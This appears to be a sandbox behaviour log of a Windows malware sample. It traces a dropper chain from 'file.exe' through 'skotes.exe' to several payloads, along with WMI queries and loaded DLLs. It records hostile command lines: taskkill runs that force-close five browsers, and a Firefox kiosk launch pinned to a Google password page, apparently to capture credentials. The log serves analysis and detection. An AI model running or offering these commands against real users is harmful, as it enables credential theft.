Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5024
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5956
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1492
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4540
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1704
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9024
Source: C:\Program Files\Windows Media Player\graph\graph.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 9024
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe "C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe "C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe "C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe "C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe "C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe "C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe "C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"	Jump to behavior
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe "C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe "C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014441001\602c785fe5.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\F0A3.tmp.ctx.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: apphelp.dll	Jump to behavior
